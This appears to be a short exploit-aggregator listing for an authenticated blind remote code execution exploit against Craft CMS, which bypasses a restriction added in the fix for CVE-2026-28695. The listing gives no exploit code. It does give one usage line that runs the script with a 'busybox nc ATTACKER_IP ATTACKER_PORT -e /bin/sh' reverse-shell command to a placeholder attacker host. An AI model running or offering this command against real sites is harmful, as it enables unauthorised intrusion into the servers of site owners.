Skip to content
Exploit for Improper Neutralization of Special Elements Used in a Template Engine in Craftcms Craft_Cms

Exploit for Improper Neutralization of Special Elements Used in a Template Engine in Craftcms Craft_Cms

Sploitus • September 27, 2026

Authenticated blind remote code execution in Craft CMS. Bypasses the create() - BaseObject restriction added in the CVE-2026-28695 fix (commit e31e508).

python3 exp.py -t -u user -p 'password' -c 'busybox nc ATTACKER_IP ATTACKER_PORT -e /bin/sh'

This script is intended for educational purposes only. The author is not responsible for any misuse or damage caused by this exploit. Always ensure you have permission before testing or exploiting vulnerabilities!

Extracted Entities

Attack Types (1)

MITRE ATT&CK (1)

Platforms (1)